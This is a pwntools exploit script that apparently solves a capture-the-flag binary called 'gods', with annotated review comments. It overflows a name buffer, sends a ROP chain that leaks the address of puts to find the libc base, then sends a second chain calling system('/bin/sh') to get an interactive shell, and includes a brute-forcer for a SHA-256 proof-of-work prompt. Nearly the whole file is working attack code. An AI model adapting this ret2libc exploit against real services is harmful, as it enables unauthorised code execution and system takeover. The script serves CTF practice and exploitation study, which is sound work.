import base64
import string
from hashlib import sha256

from pwn import *
# Global pwntools settings for this script: 'debug' logging prints every byte
# sent and received, and arch/os tell the packing helpers (p64/u64) and the
# ELF loader that the target is 64-bit x86 Linux.
context.update(log_level='debug', arch='amd64', os='linux')
def proof_of_work(sh):
    """Answer the service's SHA-256 proof-of-work prompt on tube *sh*.

    Reads up to the " == " marker, treats the rest of that line as the
    target hex digest, searches the 4-character strings over ASCII letters
    and digits for one whose SHA-256 hex digest equals it, and sends the
    match after the "input your ????>" prompt.

    Nothing in the visible script calls this helper; the script below talks
    to a local process instead.
    """
    sh.recvuntil(" == ")
    target_digest = sh.recvline().strip().decode("utf8")
    alphabet = string.ascii_letters + string.digits

    def digest_matches(candidate):
        return sha256(candidate.encode()).hexdigest() == target_digest

    # method='fixed' limits the search to candidates of exactly `length`
    # characters: 62**4 strings, so the challenge is a rate limit rather
    # than an access control.
    answer = mbruteforce(digest_matches, alphabet, length=4, method='fixed')
    sh.sendlineafter("input your ????>", answer)
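# Start the challenge binary locally. The environment key was spelled
# "LD_PRELODA", which the dynamic loader ignores, so the process ran against
# the system libc while every libc offset below is taken from ./libc-2.31.so.
# Passing env= replaces the child's whole environment with this dict.
r = process('./gods', env={"LD_PRELOAD": "./libc-2.31.so"})
elf = ELF('./gods')
libc = ELF("./libc-2.31.so")

# GOT slot and PLT stub of puts, read from the binary's own symbol tables.
put_got = elf.got["puts"]
put_plt = elf.plt['puts']

# Offsets inside libc; only one[2] is read later, and the value derived from
# it is not used by either payload.
one = [0xe3b2e, 0xe3b31, 0xe3b34]

# Hard-coded address inside ./gods. NOTE(review): the payloads place the first
# argument right after it, so this is presumably a `pop rdi; ret` gadget --
# confirm against the binary. A fixed 0x40xxxx address only holds when the
# binary is loaded at a fixed base (non-PIE).
pdt = 0x4015d3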
def z():
    """Attach gdb to the running process ``r`` (debugging helper).

    The visible script never calls it.
    """
    gdb.attach(r)
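# Menu dialogue that precedes the name prompt. The binary is not on this page,
# so why these particular rank/name values are needed cannot be confirmed here.
r.sendlineafter("(*^_^*)", "yes")
r.sendlineafter("Rank: ", str(2))
r.sendlineafter("Name: ", 'a' * 7)
r.sendlineafter("Rank: ", str(272))
r.sendlineafter("Name: ", "nameles")

# Stage 1: padding, then a chain that calls puts(puts@got) and returns to
# 0x401236. Payloads are built from bytes literals because p64() returns
# bytes; mixing str and bytes raises TypeError on Python 3.
# NOTE(review): 0x401236 presumably re-enters the function that asks for the
# name, since the same prompt is awaited again below -- confirm.
pd = b'a' * 0x18 + b'nameles\x00' + b'a' * 8
pd += p64(pdt) + p64(put_got) + p64(put_plt) + p64(0x401236)
r.sendlineafter("what's your name?", pd)

# The bytes printed by puts are the runtime address of puts. u64() needs
# exactly 8 bytes, so this assumes at most 8 bytes arrive up to and including
# the 0x7f byte.
r.recvuntil("of XDSEC!\n")
leak = r.recvuntil("\x7f")
libcbase = u64(leak.ljust(8, b'\x00')) - libc.sym['puts']
# A base that is not page-aligned means ./libc-2.31.so is not the libc the
# process actually loaded.
log.success("libcbase:" + hex(libcbase))

# Computed but not used by the second payload.
onegadget = one[2] + libcbase

# next(iterator) works on Python 2 and 3; the .next() method is Python 2 only.
binsh = libcbase + next(libc.search(b'/bin/sh'))
system = libcbase + libc.sym['system']

# Stage 2: same padding, then system("/bin/sh").
# NOTE(review): 0x40101a is presumably a bare `ret` that keeps the stack
# 16-byte aligned for system() -- confirm against the binary.
pd = b'a' * 0x18 + b'nameles\x00' + b'a' * 8
pd += p64(0x40101a) + p64(pdt) + p64(binsh) + p64(system)
r.sendlineafter("what's your name?", pd)
r.interactive()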